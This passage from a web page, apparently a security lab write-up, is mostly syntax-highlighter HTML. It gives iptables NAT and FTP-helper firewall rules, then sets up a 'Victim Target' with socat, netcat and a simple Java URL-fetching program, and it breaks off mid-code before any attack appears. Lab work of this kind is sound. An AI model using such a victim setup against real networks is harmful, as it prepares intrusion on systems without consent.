class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  iptables -t nat -A POSTROUTING -s 10.0.0.0\/255.255.255.0 -j MASQUERADE<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485a3995303682-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485a3995303682-1\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nat<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">POSTROUTING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.0.0.0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">255.255.255.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MASQUERADE<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>Then we will load the <em>nf_conntrack_ftp<\/em> and <em>nf_nat_ftp kernel<\/em> modules and set a couple of <em>FORWARD<\/em> rules to allow the modules to work: <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485a5854432201\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  iptables -t filter -A FORWARD -s 10.0.0.0\/255.255.255.0 -j ACCEPT   iptables -t filter -A FORWARD -d 10.0.0.0\/255.255.255.0             -m conntrack &#8211;ctstate RELATED            -m helper &#8211;helper ftp -p tcp &#8211;dport 1024:            -j ACCEPT<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485a5854432201-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485a5854432201-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485a5854432201-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485a5854432201-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485a5854432201-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485a5854432201-1\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filter<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">FORWARD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.0.0.0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">255.255.255.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ACCEPT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485a5854432201-2\"><span class=\"crayon-e\"> <\/span><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filter<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">FORWARD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.0.0.0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">255.255.255.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485a5854432201-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">m<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conntrack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">ctstate <\/span><span class=\"crayon-v\">RELATED<\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485a5854432201-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">m<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">helper<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">helper <\/span><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tcp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-i\">dport<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485a5854432201-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ACCEPT<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>In these rules, the <em>10.0.0.0\/24<\/em> network is considered internal. The first forward rule above just allows all traffic outbound. The second rule allows non-passive FTP connections to connect back to clients, so long as the conntrack modules have determined the FTP client wants that connection to come back. <\/p>\n<p><u>Victim Target (VT) Setup<\/u><br \/> Make sure Java is installed and &#8216;<em>java<\/em>&#8216;, &#8216;<em>javac<\/em>&#8216; and &#8216;<em>javaws<\/em>&#8216; binaries are in <em>$PATH<\/em>. Also be sure <em>socat<\/em> and <em>netcat<\/em> are installed<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485a7811861885\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> apt-get install socat netcat-traditional<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485a7811861885-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485a7811861885-1\"><span class=\"crayon-v\">apt<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">get <\/span><span class=\"crayon-e\">install <\/span><span class=\"crayon-e\">socat <\/span><span class=\"crayon-v\">netcat<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">traditional<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>Copy the following code (we will call it <em>fetch<\/em>) to the Victim Target (VT) system and compile (javac <filename>) it:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485aa474970415\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import java.net.*;  import java.io.*;    \/**   * A complete Java class that demonstrates how to read content (text) from a URL   * using the Java URL and URLConnection classes.   *\/  public class fetch  {    public static void main(String[] args)    {      String output = getUrlContents(args[0]);      System.out.println(output);    }      private static String getUrlContents(String theUrl)    {      StringBuilder content = new StringBuilder();        \/\/ many of these calls can throw exceptions, so i&#8217;ve just      \/\/ wrapped them all in one try\/catch statement.      try      {        \/\/ create a url object        URL url = new URL(theUrl);          \/\/ create a urlconnection object        URLConnection urlConnection = url.openConnection();          \/\/ wrap the urlconnection in a bufferedreader        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(urlConnection.getInputStream()));          String line;          \/\/ read from the urlconnection via the bufferedreader        while ((line = bufferedReader.readLine()) != null)        {          content.append(line + &#8220;n&#8221;);        }        bufferedReader.close();      }      catch(Exception e)      {        e.printStackTrace();      }      return content.toString();    }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485aa474970415-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485aa474970415-48\">48<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-4\"><span class=\"crayon-c\">\/**<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-5\"><span class=\"crayon-c\"> * A complete Java class that demonstrates how to read content (text) from a URL<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-6\"><span class=\"crayon-c\"> * using the Java URL and URLConnection classes.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-7\"><span class=\"crayon-c\"> *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-8\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fetch<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-9\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">getUrlContents<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">System<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">println<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-16\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-m\">private<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">getUrlContents<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">theUrl<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">StringBuilder <\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">StringBuilder<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ many of these calls can throw exceptions, so i&#8217;ve just<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ wrapped them all in one try\/catch statement.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ create a url object<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">theUrl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ create a urlconnection object<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">URLConnection <\/span><span class=\"crayon-v\">urlConnection<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">openConnection<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-30\"><span 